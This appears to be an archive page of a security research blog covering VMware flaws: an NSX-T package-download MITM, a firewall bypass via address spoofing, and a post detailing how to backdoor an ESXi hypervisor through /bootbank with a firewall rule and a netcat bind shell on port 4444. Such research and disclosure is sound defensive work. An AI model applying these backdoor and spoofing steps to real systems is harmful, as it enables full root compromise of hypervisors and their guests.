Breaking

VMware NSX-T MITM Vulnerability (CVE-2020-3993)

NSX-T is VMware’s Software-Defined Networking (SDN) solution. Its core functionality is spanning logical networks across VMs on distributed ESXi and KVM hypervisors. The central controller of the SDN is the NSX-T Manager cluster, which is responsible for deploying the network configurations to the hypervisor hosts.

This summer, I looked into the mechanism used to add new KVM hypervisor nodes to the SDN via the NSX-T Manager. By tracing what happens on the KVM host, I discovered that the KVM hypervisor is instructed to download the NSX-T software packages from the NSX-T Manager via unencrypted HTTP and to install them without any verification. This enables a Man-in-the-Middle (MITM) attacker on the network path to replace the downloaded packages with malicious ones and thereby compromise the KVM hosts.
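To illustrate the vulnerable pattern (a schematic sketch only; the URL, package name, and commands are placeholders, not the actual NSX-T provisioning steps):

# Vulnerable pattern: fetch over plain HTTP, install without any verification
wget http://nsx-manager/repository/nsx-lcp.deb
dpkg -i nsx-lcp.deb

# Hardened pattern: authenticated transport plus an out-of-band checksum
wget https://nsx-manager/repository/nsx-lcp.deb
echo "<expected-sha256>  nsx-lcp.deb" | sha256sum -c - && dpkg -i nsx-lcp.deb

Anything an on-path attacker can rewrite during the plain-HTTP download ends up being installed with root privileges on the hypervisor, which is what makes the MITM scenario so powerful.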

After I disclosed this issue to VMware, they developed fixes and published the vulnerability in VMSA-2020-0023, assigning a CVSSv3 base score of 7.5.

Continue reading “VMware NSX-T MITM Vulnerability (CVE-2020-3993)”

Misc

VMware NSX-T Distributed Firewall can be bypassed by default

We recently came across an issue when playing around with VMware NSX-T which not everyone might be aware of when getting started with it. Because many of our customers are currently transitioning to NSX-T, we want to share it with you. In short, the Distributed Firewall (DFW) of NSX-T can be easily bypassed in the default configuration: it is only effective if the SpoofGuard feature is enabled on all logical switch ports at the same time, which is not the case by default.
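To illustrate why this matters (our own sketch, not from the original post; the interface name, MAC, and IP are assumptions): with SpoofGuard disabled, a compromised Linux guest can simply assume the L2/L3 identity of a VM that the DFW policy permits.

# Impersonate a permitted VM from a compromised guest (sketch)
ip link set dev eth0 down
ip link set dev eth0 address 00:50:56:aa:bb:cc   # MAC of a permitted VM (assumption)
ip link set dev eth0 up
ip addr flush dev eth0
ip addr add 10.0.0.23/24 dev eth0                # IP of a permitted VM (assumption)
# Traffic now matches the permitted source object and passes the DFW rules.

With SpoofGuard enabled on the logical switch port, this spoofed traffic would be dropped because it no longer matches the addresses bound to the port.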

Continue reading “VMware NSX-T Distributed Firewall can be bypassed by default”

Events

H2HC2018 – Attacking VMware NSX

Matthias and I had the pleasure of giving a talk at H2HC 2018 in São Paulo, Brazil, about attacking VMware NSX. The talk is an introduction to VMware NSX for security researchers and discusses possible attack vectors across the management, control, and data planes. We demonstrated how to prepare a fuzzing and debugging setup for the ESXi kernel and its kernel modules. Olli also supported the research. Continue reading “H2HC2018 – Attacking VMware NSX”

Misc

Security Advisory for VMware vRealize Automation Center

During a recent customer project, we identified several vulnerabilities in VMware vRealize Automation Center, such as DOM-based cross-site scripting and a missing renewal of session tokens during login. The vulnerabilities were disclosed to VMware on November 20th, 2017. A security advisory for the vulnerabilities was made available here on April 12th, 2018. Continue reading “Security Advisory for VMware vRealize Automation Center”

Breaking

VMware did it again: vCenter Remote Code Execution

Yesterday, 7Elements released the description of a Remote Code Execution vulnerability in VMware vCenter. The information comes at a good time, as I’m currently drafting a follow-up blogpost for this one, which will summarize some of our approaches to virtualization security. The vCenter vulnerability is both quite critical and particularly interesting in several ways:

Continue reading “VMware did it again: vCenter Remote Code Execution”

Breaking

Some notes on VMware vCenter Operations Manager

While fairytales often start with “Once upon a time…”, our blogposts often start with “During a recent security assessment…” — and so does this one. This time we were able to spend some time on VMware’s vCenter Operations Manager (in short: VCOPS). VCOPS is a monitoring solution for the load and health of your vSphere environment. To provide this service, two virtual machines (an analytics engine and a Web-based UI) are deployed as a so-called vApp. On startup, various scripts (mainly /usr/lib/vmware-vcops/user/conf/install/firstbootcommon.sh) configure them to match the actual environment, and the two machines communicate via an OpenVPN tunnel established directly between them. To gather the monitoring data, read-only access to the vCenter is required.

Continue reading “Some notes on VMware vCenter Operations Manager”

Breaking

Serial Port Debugging Between two Virtual Machines in VMware Fusion

In the course of our virtualization research, we came across a technical issue for which we couldn’t find an easy solution in knowledge bases and the like. However, as we found the question asked several times on the web, the following post gives a short hint on this technical detail.

If you want to connect two virtual machines in VMware Fusion using a serial port (e.g. for debugging purposes), Fusion doesn’t provide a GUI option to configure that. However, just add the following configuration to the debugger system’s VMX file:

serial0.present = "TRUE"
serial0.fileType = "pipe"
serial0.fileName = "/path/to/pipe"
serial0.yieldOnMsrRead = "True"
serial0.pipe.endPoint = "client"

and the following lines to the debuggee system’s VMX file:

serial0.present = "TRUE"
serial0.fileType = "pipe"
serial0.fileName = "/path/to/pipe"
serial0.yieldOnMsrRead = "True"

you can use the serial port just as in VMware Workstation on Linux or Windows — even though the GUI will show you an “unsupported custom setting”.
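As a usage example (not part of the original hint; a sketch assuming two Linux guests and a debuggee kernel built with kgdb support), the pipe can then carry a kernel debugging session:

# On the debuggee: attach kgdb to the virtual serial port and break in
echo ttyS0 > /sys/module/kgdboc/parameters/kgdboc
echo g > /proc/sysrq-trigger

# On the debugger: the other end of the pipe shows up as a regular serial port
gdb ./vmlinux -ex 'set serial baud 115200' -ex 'target remote /dev/ttyS0'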

HTH & have a good one,
Matthias

Breaking

VMDK Has Left the Building — Newsletter

We are pleased to announce that we summarized the results from our VMDK research in our latest newsletter.

We hope you enjoy the read and get some “food for thought”!

The newsletter can be found at:
ERNW_Newsletter_41_ExploitingVirtualFileFormats.pdf

A digitally signed version can be found at:
ERNW_Newsletter_41_ExploitingVirtualFileFormats_signed.pdf

Enjoy your weekend,
Matthias

Breaking

VMDK Has Left the Building – Write Access

In our last series of posts on the VMDK file inclusion attack, we focused on read access and the prerequisites for the attack, but said little about potential write access. As we promised to cover write access in the course of our future research, the following post describes our latest results.

First of all, the same prerequisites as for read access (which will be refined a little later on) must be fulfilled, and the same steps have to be performed in order to carry out the attack successfully. If that is the case, there are several POIs (Partitions Of Interest) on an ESXi hypervisor that are interesting to include:

  • /bootbank → contains several archives which build the hypervisor’s filesystem once they are unpacked
  • /altbootbank → a backup of the prior version of /bootbank, e.g. copied before a firmware update
  • /scratch → mainly log files and core dumps are stored here
  • /vmfs/volumes/datastoreX → storage for virtual machine files

The root filesystem is stored on a ramdisk which is populated at boot time from the archives stored in the bootbank partition. As this means there is no actual root partition (it is generated dynamically at boot time, and there is no such thing as a device descriptor for the ramdisk), the root filesystem is excluded from our attack tree, at least at first sight.

While trying to write to different partitions, we noticed that writing sometimes fails. Investigating the reason for the failure, we found that this is only the case for certain partitions, such as /scratch. After monitoring the specific write process, we observed the following errors:

Virtual Machine:

attx kernel: [93.238762] sd 0:0:0:0: [sda] Unhandled sense code
attx kernel: [93.238767] sd 0:0:0:0: [sda]  Result: hostbyte=invalid
                         driverbyte=DRIVER_SENSE
attx kernel: [93.238771] sd 0:0:0:0: [sda]  Sense Key : Data Protect [current]
attx kernel: [93.238776] sd 0:0:0:0: [sda]  Add. Sense: No additional sense information
attx kernel: [93.238780] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 02 04 bd 20 00 00 08 00
attx kernel: [93.238790] end_request: critical target error, dev sda, sector 33864992
attx kernel: [93.239029] Buffer I/O error on device sda, logical block 4233124
attx kernel: [93.239181] lost page write due to I/O error on sda

Hypervisor:

cpu0:2157)WARNING: NMP: nmpDeviceTaskMgmt:2210:Attempt to issue lun reset on device
                        naa.600508b1001ca97740cc02561658c136. This will clear any
                        SCSI-2 reservations on the device.
cpu0:2157)<4>hpsa 0000:05:00.0: resetting device 6:0:0:1
cpu0:2157)<4>hpsa 0000:05:00.0: device is ready

Since it seemed unlikely that the hypervisor hard drive is broken exactly when we try to write from within a guest machine, we performed further tests (using various bash scripts and endless writing loops, as sketched below) and found out that this error occurs when the hypervisor and a guest machine try to write to the same device at the same time. Because the hypervisor continuously writes log files to the /scratch filesystem and generates all kinds of I/O on the /vmfs data stores (due to the running virtual machines stored on those partitions), it was not possible to write to those devices in a reliable way.
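One of those endless writing loops looked roughly like the following sketch (bash; /dev/sdb stands for the included hypervisor device as it appears inside our attacking VM):

# Hammer the included device with writes and log the resulting I/O errors
while true; do
    dd if=/dev/urandom of=/dev/sdb bs=512 count=1 \
       seek=$((RANDOM % 100000)) conv=notrunc 2>> write-errors.log
done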

Fortunately (at least from an attacker’s point of view 😉 ), the remaining partitions, /bootbank and /altbootbank, are only accessed at boot time, and it is hence possible to write to them in a reliable way. At this point, the initially mentioned fact about the missing root partition becomes important again: as the root partition would be the first and most promising target for write access, it would most probably also be locked by the hypervisor, since various files on it would be written to periodically. Searching for a way to write to the dynamically generated root partition anyway, we came up with the following steps:

  • Include the device holding the /bootbank partition.
  • Write to the /bootbank partition.
  • Wait for the hypervisor to reboot (or perform the potential DoS attack we identified, which will be described in a future post).
  • Enjoy the files from the /bootbank partition being populated to the dynamically created root partition.

The last step is of particular relevance. /bootbank holds several files containing archives of system-critical files and directories of the ESXi hypervisor. For example, /bootbank/s.v00 contains an archive of directories and files, including parts of /etc. The hypervisor restores these directories (such as /etc) at startup from the files stored in /bootbank. As we are able to write files to /bootbank, it is possible to replace the contents of /bootbank/s.v00 and thus the contents of /etc on the hypervisor ramdisk. To make sure that certain files in /etc actually get replaced, we can consult /bootbank/boot.cfg, which holds the list of archives that get extracted at boot time. Having all the information necessary to write to the root partition of the hypervisor, these are the steps to be performed:

  • Obtain the /bootbank archive, in this example /bootbank/s.v00, using the well-known attack vector.
  • Convert/extract the archive: the archives in /bootbank are packed with a special version of tar which is incompatible with GNU tar. However, this vmtar version can be ported to a GNU/Linux system by copying the vmtar binary and libvmlibs.so from any ESXi installation (see the sketch after this list).
  • Modify or add files.
  • Repack the archive.
  • Deploy the modified archive to /bootbank using the write access.
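The following sketch shows how this cycle can look; the vmtar flags are assumptions based on the binary taken from our ESXi 5 test installation, and the file names are examples:

# boot.cfg lists the archives that get unpacked into the ramdisk at boot
grep ^modules /bootbank/boot.cfg

# Repacking on a GNU/Linux system with the copied vmtar binary
export LD_LIBRARY_PATH=.             # libvmlibs.so copied next to vmtar
./vmtar -x s.v00 -o s.tar            # vmtar archive -> plain tar
mkdir extracted && tar xf s.tar -C extracted
# ... modify or add files below extracted/ ...
(cd extracted && tar cf ../s.tar *)
./vmtar -c s.tar -o s.v00            # plain tar -> vmtar archive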

Following this generic process, we were able to install a backdoor on our ESXi 5 hypervisor. In a first step, we opened a port in the ESXi firewall (which has a drop-all policy), as we wanted to deploy a bind shell (we could have used a connect-back shell instead, but we also wanted to demonstrate that it is possible to modify system-critical settings). The firewall is configured by XML files stored in /etc/vmware/firewall. These XML files are built as follows:

<ConfigRoot>
  <service id='0000'>
    <id>sshServer</id>
    <rule id='0000'>
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>22</port>
    </rule>
    <enabled>false</enabled>
    <required>false</required>
  </service>
[...]
</ConfigRoot>

The XML format is largely self-explanatory: every service has a unique identifier (id) and can have inbound and outbound rules. To enable a rule at system boot, the enabled field has to be set to true.

Based on this schema, it is easy to deploy a new firewall rule: simply place a new XML file in /etc/vmware/firewall inside the archive which will be written to the bootbank later on.

For example, to open port 4444 for the bind shell we deploy below:

<ConfigRoot>
  <service id="0000">
    <id>remote Bind Shell</id>
    <rule id="0000">
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>4444</port>
    </rule>
    <enabled>true</enabled>
    <required>false</required>
  </service>
</ConfigRoot>

After overwriting one of the archives in /bootbank with our altered one, this ruleset will be applied the next time the hypervisor boots.

The next step is to bind a shell to the opened port. Unfortunately, the netcat installed by default on the hypervisor does not support the “-e” option, which executes a command once a connection is established. The most basic netcat bind shell just listens on a port and connects all input to the binary specified by the -e switch:

netcat -l -p 4444 -e /bin/sh

Luckily, the netcat version of the 32-bit BackTrack distribution is compatible with the ESXi platform and supports the -e switch. After copying this binary to the hypervisor, we just need to make sure that the backdoor is started during the boot process by adding the following line to /etc/rc.local:

/etc/netcat -l -p 4444 -e /bin/sh &

Next time the hypervisor starts, a remote shell will listen on port 4444 with root privileges. The following steps summarize the process of fully compromising the ESXi hypervisor:

  • Include the /bootbank partition using our well-known attack path.
  • Unpack /bootbank/s.v00.
  • Add our bind shell port to the firewall by placing the file described above in /path/to/extracted/etc/vmware/firewall.
  • Add the netcat binary as /path/to/extracted/etc/netcat.
  • Add the above line to /path/to/extracted/etc/rc.local.
  • Wait for the next reboot of the hypervisor (or our post on the potential DoS 😉 ).

At the end of the day, this means that once an attacker is able to upload VMDK files to an ESXi environment (in a way that fulfills the stated requirements), it is possible to alter the configuration of the underlying hypervisor and even to install a backdoor which grants command-line access.

Enjoy!

Pascal & Matthias

Breaking

Fuzzing VMDK files

As announced at last week’s #HITB2012AMS, I’ll describe the fuzzing steps performed during our initial research. The very first step was defining the interfaces we wanted to test. We decided to go with the plain-text VMDK file, as this is the main virtual disk description file and, in most deployment scenarios, user controlled, and with the data part of a special kind of VMDK file, the Host Sparse Extent.

The fuzzing toolkit used is dizzy, which just got an update last week (bringing you guys closer to trunk state 😉 ).

Fuzzing-wise, the main VMDK file is straightforward. Here is a short sample file:

# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=fffffffe
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 40960 VMFS "ts_2vmdk-flat.vmdk"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "c818e173248456a9f5d83051fffffffe"
ddb.uuid = "60 00 C2 94 23 7b c1 41-51 76 b2 79 23 b5 3c 93"
ddb.geometry.cylinders = "20"
ddb.geometry.heads = "64"
ddb.geometry.sectors = "32"
ddb.adapterType = "buslogic"


As one can easily see, the file is plain text and based on a name=value syntax. So a fuzzing script for this file would look something like this:

name = "vmdkfile"
objects = [
    field("descr_comment", None, "# Disk DescriptorFile\n", none),

    field("version_str", None, "version=", none),
    field("version", None, "1", std),
    field("version_br", None, "\n", none),

    field("encoding_str", None, "encoding=", none),
    field("encoding", None, '"UTF-8"', std),
    field("encoding_br", None, "\n", none),
    [...]
    ]
functions = []


The first field, descr_comment, and the second field, version_str, are plain static, as defined by the last parameter (none), so they won’t get mutated. The first actually fuzzed string is the version field, which has a default value of the string 1 and will be mutated with all strings in your fuzz library.

As the attentive reader might have noticed, this is just a first attempt, as there is one special inconsistency in the example file above: the quoting. Some values are quoted, some are not. A good fuzzing script would play with exactly this inconsistency: is it possible to set version to a string? Could one set the encoding to an integer value?

The second file we tried to fuzz was the Host Sparse Extent, a data file which, unlike the Flat Extents, is not plain data but carries a binary file header. This header is parsed by the ESX host and, as it is included in the data file, may be user defined. VMware’s definition is the following:

typedef struct COWDisk_Header {
    uint32 magicNumber;
    uint32 version;
    uint32 flags;
    uint32 numSectors;
    uint32 grainSize;
    uint32 gdOffset;
    uint32 numGDEntries;
    uint32 freeSector;
    union {
        struct {
            uint32 cylinders;
            uint32 heads;
            uint32 sectors;
        } root;
        struct {
            char parentFileName[COWDISK_MAX_PARENT_FILELEN];
            uint32 parentGeneration;
        } child;
    } u;
    uint32 generation;
    char name[COWDISK_MAX_NAME_LEN];
    char description[COWDISK_MAX_DESC_LEN];
    uint32 savedGeneration;
    char reserved[8];
    uint32 uncleanShutdown;
    char padding[396];
} COWDisk_Header;


Interesting header fields are all the C strings (think about NULL termination) and, of course, gdOffset in combination with numSectors and grainSize, as manipulating these values could lead the ESX host to access data outside of the user-deployed data file.
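To get a feeling for these fields before wiring them into a dizz script, one can also patch the header by hand. Per the struct above, gdOffset is the sixth uint32 and thus sits at byte offset 20 (little-endian); a sketch, with the file name being an example:

# Overwrite gdOffset with 0xffffffff in a Host Sparse Extent
printf '\377\377\377\377' | dd of=fuzzed-sparse.vmdk bs=1 seek=20 conv=notrunc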

So far, so good. After writing the fuzzing scripts, one needs to generate a lot of VMDK files. This was done using dizzy:

./dizzy.py -o file -d /tmp/vmdkfuzzing.vmdk -w 0 vmdkfile.dizz


Last but not least, we needed to automate the deployment of the generated VMDK files. This was done with a simple shell script on the ESX host using vim-cmd, a command-line tool for administrating virtual machines; a sketch of such a loop follows below.
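Such a loop could look like the following sketch (datastore paths, file names, and timings are assumptions; vim-cmd solo/registervm prints the ID of the newly registered VM):

# Deploy each generated VMDK, boot the VM against it, and clean up again
for f in /vmfs/volumes/datastore1/fuzzing/*.vmdk; do
    cp "$f" /vmfs/volumes/datastore1/target/target.vmdk
    VMID=$(vim-cmd solo/registervm /vmfs/volumes/datastore1/target/target.vmx)
    vim-cmd vmsvc/power.on "$VMID"
    sleep 30                          # give the host time to parse the extent header
    vim-cmd vmsvc/power.off "$VMID"
    vim-cmd vmsvc/unregister "$VMID"
done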

As of now, the main fuzzing is still running in our lab, so no big results on that front yet. Feel free to use the provided fuzzing scripts in your own lab. Find the two fuzzing scripts here and here. We will share more results when the fuzzing is finished.

Have a nice day and start fuzzing 😉

Daniel and Pascal
